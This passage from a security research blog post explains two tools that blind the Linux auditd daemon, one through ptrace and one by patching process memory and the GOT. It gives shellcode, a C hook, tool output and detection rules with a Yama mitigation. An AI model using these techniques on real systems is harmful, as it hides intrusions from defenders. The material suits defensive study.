<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>[root@host daphne]# ./dist/daphne-x64 <span style="color:#ae81ff">427</span> /etc/shadow /etc/no_shadow
</span></span><span style="display:flex;"><span>[+] Attached to process: 427
</span></span><span style="display:flex;"><span>[+] Configured ptrace correctly.
</span></span><span style="display:flex;"><span>[+] Starting ptrace event loop.
</span></span><span style="display:flex;"><span>[+] Intercepted SYS_RECVFROM call.
</span></span><span style="display:flex;"><span>[+] Intercepted SYS_RECVFROM call.
</span></span><span style="display:flex;"><span>[+] Replacing &#39;/etc/shadow&#39; with &#39;/etc/no_shadow&#39;.
</span></span><span style="display:flex;"><span>[+] Intercepted SYS_RECVFROM call.
</span></span><span style="display:flex;"><span>[+] Replacing &#39;/etc/shadow&#39; with &#39;/etc/no_shadow&#39;.
</span></span><span style="display:flex;"><span>[+] Intercepted SYS_RECVFROM call.
</span></span></code></pre></div><p>After starting <em>daphne</em>, we attempt to access <code>/etc/shadow</code> again and obtain the following
log entries:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-java" data-lang="java"><span style="display:flex;"><span>type<span style="color:#f92672">=</span>SYSCALL msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690784393.787</span><span style="color:#f92672">:</span><span style="color:#ae81ff">1334</span><span style="color:#f92672">):</span> arch<span style="color:#f92672">=</span>c000003e syscall<span style="color:#f92672">=</span><span style="color:#ae81ff">257</span> success<span style="color:#f92672">=</span>no exit<span style="color:#f92672">=-</span><span style="color:#ae81ff">13</span> a0<span style="color:#f92672">=</span>ffffff9c a1<span style="color:#f92672">=</span><span style="color:#ae81ff">7f</span>fc87379740 a2<span style="color:#f92672">=</span><span style="color:#ae81ff">80000</span> a3<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> items<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> ppid<span style="color:#f92672">=</span><span style="color:#ae81ff">1476</span> pid<span style="color:#f92672">=</span><span style="color:#ae81ff">1566</span> auid<span style="color:#f92672">=</span><span style="color:#ae81ff">4294967295</span> uid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> gid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> euid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> suid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> fsuid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> egid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> sgid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> fsgid<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span> tty<span style="color:#f92672">=</span>pts3 ses<span style="color:#f92672">=</span><span style="color:#ae81ff">4294967295</span> comm<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;bat&#34;</span> exe<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/usr/bin/bat&#34;</span> key<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;etcpasswd&#34;</span>ARCH<span style="color:#f92672">=</span>x86_64 SYSCALL<span style="color:#f92672">=</span>openat AUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;unset&#34;</span> UID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> GID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> EUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> SUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> FSUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> EGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> SGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span> FSGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;user&#34;</span>
</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>PATH msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690784393.787</span><span style="color:#f92672">:</span><span style="color:#ae81ff">1334</span><span style="color:#f92672">):</span> item<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/etc/no_shadow&#34;</span> inode<span style="color:#f92672">=</span><span style="color:#ae81ff">270575</span> dev<span style="color:#f92672">=</span>ca<span style="color:#f92672">:</span><span style="color:#ae81ff">03</span> mode<span style="color:#f92672">=</span><span style="color:#ae81ff">0100000</span> ouid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> ogid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> rdev<span style="color:#f92672">=</span><span style="color:#ae81ff">00</span><span style="color:#f92672">:</span><span style="color:#ae81ff">00</span> nametype<span style="color:#f92672">=</span>NORMAL cap_fp<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fi<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fe<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fver<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_frootid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>OUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> OGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>PROCTITLE msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690784393.787</span><span style="color:#f92672">:</span><span style="color:#ae81ff">1334</span><span style="color:#f92672">):</span> proctitle<span style="color:#f92672">=</span><span style="color:#ae81ff">626174002</span>D70002F6574632F6E6F5F736861646F77
</span></span></code></pre></div><h4 id="detection">Detection</h4>
<p>If you reproduce the demonstration above with the <em>auditd</em> configuration that was
suggested at the beginning of this post, you might get surprised. This <em>auditd</em>
rule set monitors <em>ptrace</em> usage and therefore detects <em>daphne</em>. The following listing
shows the corresponding <em>auditd</em> rules:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#75715e">## Injection</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">### These rules watch for code injection by the ptrace facility.</span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">### This could indicate someone trying to do something bad or just debugging</span>
</span></span><span style="display:flex;"><span>-a always,exit -F arch<span style="color:#f92672">=</span>b32 -S ptrace -F a0<span style="color:#f92672">=</span>0x4 -k code_injection
</span></span><span style="display:flex;"><span>-a always,exit -F arch<span style="color:#f92672">=</span>b64 -S ptrace -F a0<span style="color:#f92672">=</span>0x4 -k code_injection
</span></span><span style="display:flex;"><span>-a always,exit -F arch<span style="color:#f92672">=</span>b32 -S ptrace -F a0<span style="color:#f92672">=</span>0x5 -k data_injection
</span></span><span style="display:flex;"><span>-a always,exit -F arch<span style="color:#f92672">=</span>b64 -S ptrace -F a0<span style="color:#f92672">=</span>0x5 -k data_injection
</span></span><span style="display:flex;"><span>-a always,exit -F arch<span style="color:#f92672">=</span>b32 -S ptrace -F a0<span style="color:#f92672">=</span>0x6 -k register_injection
</span></span><span style="display:flex;"><span>-a always,exit -F arch<span style="color:#f92672">=</span>b64 -S ptrace -F a0<span style="color:#f92672">=</span>0x6 -k register_injection
</span></span><span style="display:flex;"><span>-a always,exit -F arch<span style="color:#f92672">=</span>b32 -S ptrace -k tracing
</span></span><span style="display:flex;"><span>-a always,exit -F arch<span style="color:#f92672">=</span>b64 -S ptrace -k tracing
</span></span></code></pre></div><p>In theory, <em>daphne</em> can filter the resulting events from these rules, but
since <em>daphne</em> keeps tracing <em>auditd</em> while running, these rules create a ton of events
that cause a noticeable system slowdown. The <em>auditd</em> event queue is flooded with
<em>ptrace</em> events and regular events are processed with a noticeable time delay.</p>
<p>Within the <em>auditd</em> logs, the only visible <em>daphne</em> related event is an <code>OBJ_PID</code>
event that records a signal being send to <em>auditd</em>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-java" data-lang="java"><span style="display:flex;"><span>type<span style="color:#f92672">=</span>OBJ_PID msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690785691.461</span><span style="color:#f92672">:</span><span style="color:#ae81ff">645395</span><span style="color:#f92672">):</span> opid<span style="color:#f92672">=</span><span style="color:#ae81ff">427</span> oauid<span style="color:#f92672">=-</span><span style="color:#ae81ff">1</span> ouid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> oses<span style="color:#f92672">=-</span><span style="color:#ae81ff">1</span> ocomm<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;auditd&#34;</span>OAUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;unset&#34;</span> OUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span>
</span></span></code></pre></div><p>When <em>daphne</em> is used to drop certain events completely, it can also be detected
by the missing event IDs. As demonstrated above, each event has a unique event ID
that increments for each emitted event. If some event IDs are missing, this can be
another indicator for tampering.</p>
<p>Additionally, monitoring error messages of the <em>auditd</em> daemon can be beneficial. As discussed above
<em>daphne</em> drops events by clearing the <em>netlink</em> output buffer. This leads to an error message
when the buffer is processed by <em>auditd</em>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>Jul <span style="color:#ae81ff">31</span> 13:25:02 auditd auditd<span style="color:#f92672">[</span>427<span style="color:#f92672">]</span>: Netlink message from kernel was not OK
</span></span><span style="display:flex;"><span>Jul <span style="color:#ae81ff">31</span> 13:25:02 auditd auditd<span style="color:#f92672">[</span>427<span style="color:#f92672">]</span>: Netlink message from kernel was not OK
</span></span><span style="display:flex;"><span>Jul <span style="color:#ae81ff">31</span> 13:25:02 auditd auditd<span style="color:#f92672">[</span>427<span style="color:#f92672">]</span>: Netlink message from kernel was not OK
</span></span><span style="display:flex;"><span>Jul <span style="color:#ae81ff">31</span> 13:25:02 auditd auditd<span style="color:#f92672">[</span>427<span style="color:#f92672">]</span>: Netlink message from kernel was not OK
</span></span></code></pre></div><p>Obviously, traces like missing event IDs or <em>auditd</em> error messages can be prevented
by adopting <em>daphne</em> to create dummy events instead of dropping them. Therefore, using
these indicators to detect tampering is not reliable.</p>
<p>The preferred method for preventing <em>ptrace</em> related attacks is to disable
<em>ptrace</em> usage. The <a href="https://www.kernel.org/doc/html/v4.15/admin-guide/LSM/Yama.html">Yama</a>
security module is one way to achieve this. The following listing demonstrates how to
prevent usage of <em>ptrace</em> on supported Linux versions:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>[root@host ~]# echo -n <span style="color:#ae81ff">3</span> &gt; /proc/sys/kernel/yama/ptrace_scope
</span></span></code></pre></div><p>However, disabling <em>ptrace</em> globally can influence other applications like
<em>EDR</em> solutions that use it for memory scanning. Another solution could be to write
a custom security module that only disallows tracing for critical processes like
<em>auditd</em> or <em>laurel</em>.</p>
<h3 id="apollon---technical-details">apollon - Technical Details</h3>
<p>After implementing <em>daphne</em> we thought about other solutions for blindsiding <em>auditd</em>
that do not continuously trigger <em>ptrace</em> logging. Our colleague <a href="https://twitter.com/thefLinkk">Sebastian Feldmann</a>,
author of our <em>Sysmon</em> evasion tool <a href="https://github.com/codewhitesec/SysmonEnte">SysmonEnte</a>,
asked whether we cannot write <code>/proc/PID/mem</code> to patch the <em>auditd</em> process.
My initial thought was that it cannot be that easy, but to my surprise, it is!</p>
<p><a href="https://man7.org/linux/man-pages/man5/proc.5.html">proc</a> is a pseudo-filesystem for
interfacing with the Linux kernel. It can be used to obtain process and system information,
with some paths even being writable to allow modifying process or system properties.
<code>/proc/pid/mem</code> in particular allows access to mapped memory pages of a process and even
though the manual only describes access through <code>open</code>, <code>read</code> and <code>lseek</code>, the path is also
writable and allows patching process memory.</p>
<p>Now we knew that we can patch <em>auditd</em> process memory via <code>/proc/pid/mem</code>. But where
should we patch? If you ever played <em>binary CTF</em> challenges, you probably know that
writing the <em>global offset table</em> (<em>GOT</em>) is a good way to change the control flow of
a program. The <em>GOT</em> resides in the <code>.data</code> section of a program and contains
pointers to functions loaded from shared libraries. Each time a program calls a method
from a shared library, the pointer contained in the <em>GOT</em> is followed, which makes
it suitable for hijacking control flow. That being said, binary exploitation mitigations
have improved and modern applications often utilize a protection mechanism called
<em>Relocation Read-Only</em> (<em>RELRO</em>) that marks the memory sections that contain the <em>GOT</em>
non writable.</p>
<p>Surprisingly, the <em>proc</em> pseudo-filesystem does not care at all. There is a great
<a href="https://offlinemark.com/2021/05/12/an-obscure-quirk-of-proc/">blog post</a> by
<a href="https://twitter.com/offlinemark">Mark Mossberg</a> explaining why the kernel does not
care about page permissions when writing to <code>/proc/pid/mem</code>. This bypasses the
<em>RELRO</em> protected memory sections of <em>auditd</em> and even allows to patch its executable memory itself,
which will be required in the next step.</p>
<p>A suitable target for patching the <em>GOT</em> is the address of <code>recvfrom</code> within <em>libc</em>.
This function is utilized within <code>libaudit.so</code> to read events from the kernel via
<em>netlink</em>. By replacing the function pointer to <code>recvfrom</code> within the <em>GOT</em> of
<code>libaudit.so</code> with a pointer to an event filtering version of <code>recvfrom</code>, <em>auditd</em>
can be blindsided again. But where to find an event filtering version of <code>recvfrom</code>?</p>
<p>Obviously, a function that behaves similar to <code>recvfrom</code>, but filters certain events
cannot be found within the address space of the <em>auditd</em> process. Instead, it is required
to write some event filtering shellcode, inject it into the <em>auditd</em> process and replace
the <code>recvfrom</code> pointer within the <em>GOT</em> of <code>libaudit.so</code> with a pointer to it. Since
<code>/proc/pid/mem</code> does not care about page permissions, finding an unused executable
area (<a href="https://en.wikipedia.org/wiki/Code_cave">code cave</a>) of memory is not difficult.</p>
<p>The difficulty of creating the event filtering shellcode depends
on what kind of event filtering should be achieved. The following assembly demonstrates a simple
variant, where all events are filtered by returning a length of zero as the result of the
<code>recvfrom</code> call:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-asm" data-lang="asm"><span style="display:flex;"><span><span style="color:#a6e22e">BITS</span> <span style="color:#ae81ff">64</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">PUSH</span>    <span style="color:#66d9ef">R12</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">MOV</span>     <span style="color:#66d9ef">R12</span>,<span style="color:#ae81ff">0xfffffffffffa</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">CALL</span>    <span style="color:#66d9ef">R12</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">MOV</span>     <span style="color:#66d9ef">RAX</span>,<span style="color:#ae81ff">0x00</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">POP</span>     <span style="color:#66d9ef">R12</span>
</span></span><span style="display:flex;"><span>    <span style="color:#a6e22e">RET</span>
</span></span></code></pre></div><p>The value <code>0xfffffffffffa</code> is a placeholder that gets replaced with the <em>libc</em> address of
<code>recvfrom</code> when the shellcode gets injected by <em>apollon</em>. A more dedicated shellcode example
is <a href="https://github.com/codewhitesec/apollon/blob/master/src/filter-selective.asm">filter-selective.asm</a>,
that drops events selectively. The following <code>C</code> code was used as a template to create the
shellcode:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-c" data-lang="c"><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdio.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;string.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;stdlib.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">#include</span> <span style="color:#75715e">&lt;sys/socket.h&gt;</span><span style="color:#75715e">
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"></span>
</span></span><span style="display:flex;"><span><span style="color:#75715e">/*
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"> * hook function for intercepting recvfrom calls. This function performs
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"> * the syscall and inspects the returned bytes. If the specified sequence
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"> * is found within the returned bytes, recvfrom is called again until a
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"> * new event is obtained that does no longer match the pattern.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e"> */</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">ssize_t</span> <span style="color:#a6e22e">hook_func</span>(<span style="color:#66d9ef">int</span> sockfd, <span style="color:#66d9ef">char</span><span style="color:#f92672">*</span> buf, <span style="color:#66d9ef">size_t</span> len, <span style="color:#66d9ef">int</span> flags, <span style="color:#66d9ef">struct</span> sockaddr<span style="color:#f92672">*</span> src_addr, <span style="color:#66d9ef">socklen_t</span><span style="color:#f92672">*</span> addrlen)
</span></span><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">/*
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">     * Receive the next audit event message from netlink.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">     */</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">ssize_t</span> length <span style="color:#f92672">=</span> <span style="color:#a6e22e">recvfrom</span>(sockfd, buf, len, flags, src_addr, addrlen);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#75715e">/*
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">     * Now we go to the audit_message (buf + 16) and check whether it contains the desired
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">     * pattern. The example pattern from here needs to be replaced in the generated
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">     * assembly. This can be done dynamically. apollon replaces the pattern 0xffffffffff01
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">     * with a pointer to the second command line argument.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">     */</span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">while</span> (<span style="color:#a6e22e">strstr</span>(buf <span style="color:#f92672">+</span> <span style="color:#ae81ff">16</span>, <span style="color:#e6db74">&#34;pid=1337&#34;</span>))
</span></span><span style="display:flex;"><span>    {
</span></span><span style="display:flex;"><span>        <span style="color:#75715e">/*
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">         * Since a single event is usually scattered around multiple event messages, we
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">         * need to obtain the event ID (buf + 37) and filter all proceeding event messages
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">         * that belong to the same event.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">         */</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> curr_event <span style="color:#f92672">=</span> <span style="color:#ae81ff">0</span>;
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">unsigned</span> <span style="color:#66d9ef">int</span> filter_event <span style="color:#f92672">=</span> <span style="color:#a6e22e">strtoul</span>(buf <span style="color:#f92672">+</span> <span style="color:#ae81ff">37</span>, NULL, <span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#75715e">/*
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">         * Request new events until the received event ID  does no longer match the filtered
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">         * event ID. If this is the case, simply continue with the outer loop, as the new event
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">         * could match the filter again.
</span></span></span><span style="display:flex;"><span><span style="color:#75715e">         */</span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">do</span>
</span></span><span style="display:flex;"><span>        {
</span></span><span style="display:flex;"><span>            length <span style="color:#f92672">=</span> <span style="color:#a6e22e">recvfrom</span>(sockfd, buf, len, flags, src_addr, addrlen);
</span></span><span style="display:flex;"><span>            curr_event <span style="color:#f92672">=</span> <span style="color:#a6e22e">strtoul</span>(buf <span style="color:#f92672">+</span> <span style="color:#ae81ff">37</span>, NULL, <span style="color:#ae81ff">0</span>);
</span></span><span style="display:flex;"><span>        }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">while</span> (curr_event <span style="color:#f92672">==</span> filter_event);
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">return</span> length;
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Summarized, apollon performs the following operations to blindside <em>auditd</em>:</p>
<ol>
<li>Use <code>/proc/pid/maps</code> to find the data segment of <code>libaudit.so</code> within the <em>auditd</em> process</li>
<li>Use <code>/proc/pid/maps</code> to find the text segment of <code>libc.so</code> within the <em>auditd</em> process</li>
<li>Determine the offset of <code>recvfrom</code> in <code>libc.so</code> and calculate its position within the <em>auditd</em> process</li>
<li>Search the data segment of <code>libaudit.so</code> for a reference to <code>recvfrom</code></li>
<li>Find a <em>code cave</em> within the <em>auditd</em> process that is large enough to house the <em>event filtering shellcode</em></li>
<li>Write the <em>event filtering shellcode</em> to the <em>code cave</em></li>
<li>Replace the <code>recvfrom</code> reference within the <em>GOT</em> of <code>libaudit.so</code> with the <em>code cave</em> address</li>
</ol>
<p>After <em>auditd</em> was patched, all events pass the <em>event filtering shellcode</em> first
before being processed by <em>auditd</em>.</p>
<h4 id="demo-1">Demo</h4>
<p>The following listing shows an example invocation of <em>apollon</em>. <code>427</code> is the process ID of <em>auditd</em>,
whereas <code>1059</code> is the process ID of a bash shell that we want to exclude from monitoring:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>[root@auditd apollon]# ./apollon-selective-x64 <span style="color:#ae81ff">427</span> <span style="color:#ae81ff">1059</span>
</span></span><span style="display:flex;"><span>[+] Found data segment of 427 at 0x79edb1a33000
</span></span><span style="display:flex;"><span>[+] Found libc base address of 427 at 0x79edb1703000
</span></span><span style="display:flex;"><span>[+] Found offset of &#39;recvfrom&#39; in libc at e7cc0
</span></span><span style="display:flex;"><span>[+] Searching for pattern 0x79edb17eacc0 in data segment of 427
</span></span><span style="display:flex;"><span>[+] Data segment is 2000 bytes long.
</span></span><span style="display:flex;"><span>[+] Found &#39;recvfrom&#39; in 427 at 0x79edb1a33ea0
</span></span><span style="display:flex;"><span>[+] Preparing shellcode...
</span></span><span style="display:flex;"><span>[+] Replaced 2 occurences of recvfrom.
</span></span><span style="display:flex;"><span>[+] Found strstr in 427 at 0x79edb178fa30
</span></span><span style="display:flex;"><span>[+] Replaced 1 occurences of strstr.
</span></span><span style="display:flex;"><span>[+] Found strtoul in 427 at 0x79edb17299c0
</span></span><span style="display:flex;"><span>[+] Replaced 2 occurences of strtoul.
</span></span><span style="display:flex;"><span>[+] Found code cave for pattern matching in 427 at 0x5d2c00b162ad
</span></span><span style="display:flex;"><span>[+] Wrtiting &#39;1059&#39; to codecave.
</span></span><span style="display:flex;"><span>[+] Replaced 1 occurences of matcher pattern.
</span></span><span style="display:flex;"><span>[+] Searching codecave for 264 byte shellcode...
</span></span><span style="display:flex;"><span>[+] Found code cave in 427 at 0x5d2c00b2eaf1
</span></span><span style="display:flex;"><span>[+] Wrtiting shellcode to codecave.
</span></span><span style="display:flex;"><span>[+] Replacing &#39;recvfrom&#39; GOT entry with shellcode addr.
</span></span><span style="display:flex;"><span>[+] auditd patched successfully.
</span></span></code></pre></div><p>After patching <em>auditd</em>, we accessed the <code>/etc/shadow</code> file, first from a shell with
process ID <code>1022</code>, then within our evaded shell with process ID <code>1059</code> and afterwards
again with PID <code>1022</code>. Here is the result from the <em>auditd</em> log file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-java" data-lang="java"><span style="display:flex;"><span>type<span style="color:#f92672">=</span>SYSCALL msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690788664.304</span><span style="color:#f92672">:</span><span style="color:#ae81ff">980</span><span style="color:#f92672">):</span> arch<span style="color:#f92672">=</span>c000003e syscall<span style="color:#f92672">=</span><span style="color:#ae81ff">257</span> success<span style="color:#f92672">=</span>yes exit<span style="color:#f92672">=</span><span style="color:#ae81ff">3</span> a0<span style="color:#f92672">=</span>ffffff9c a1<span style="color:#f92672">=</span><span style="color:#ae81ff">7f</span>fe5e584772 a2<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> a3<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> items<span style="color:#f92672">=</span><span style="color:#ae81ff">1</span> ppid<span style="color:#f92672">=</span><span style="color:#ae81ff">1022</span> pid<span style="color:#f92672">=</span><span style="color:#ae81ff">1226</span> auid<span style="color:#f92672">=</span><span style="color:#ae81ff">4294967295</span> uid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> gid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> euid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> suid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> fsuid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> egid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> sgid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> fsgid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> tty<span style="color:#f92672">=</span>pts1 ses<span style="color:#f92672">=</span><span style="color:#ae81ff">4294967295</span> comm<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;cat&#34;</span> exe<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/usr/bin/cat&#34;</span> key<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;etcpasswd&#34;</span>ARCH<span style="color:#f92672">=</span>x86_64 SYSCALL<span style="color:#f92672">=</span>openat AUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;unset&#34;</span> UID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> GID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> EUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> SUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> FSUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> EGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> SGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> FSGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>PATH msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690788664.304</span><span style="color:#f92672">:</span><span style="color:#ae81ff">980</span><span style="color:#f92672">):</span> item<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> name<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;/etc/shadow&#34;</span> inode<span style="color:#f92672">=</span><span style="color:#ae81ff">270575</span> dev<span style="color:#f92672">=</span>ca<span style="color:#f92672">:</span><span style="color:#ae81ff">03</span> mode<span style="color:#f92672">=</span><span style="color:#ae81ff">0100000</span> ouid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> ogid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> rdev<span style="color:#f92672">=</span><span style="color:#ae81ff">00</span><span style="color:#f92672">:</span><span style="color:#ae81ff">00</span> nametype<span style="color:#f92672">=</span>NORMAL cap_fp<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fi<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fe<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_fver<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span> cap_frootid<span style="color:#f92672">=</span><span style="color:#ae81ff">0</span>OUID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span> OGID<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;root&#34;</span>
</span></span><span style="display:flex;"><span>type<span style="color:#f92672">=</span>PROCTITLE msg<span style="color:#f92672">=</span>audit<span style="color:#f92672">(</span><span style="color:#ae81ff">1690788664.304</span><span style="color:#f92672">:</span><span style="color:#ae81ff">980</span><span style="color:#f92672">):</span> proctitle<span style="color:#f92672">=</span><span style="color:#ae81ff">636174002</span>F6574632F736861646F77
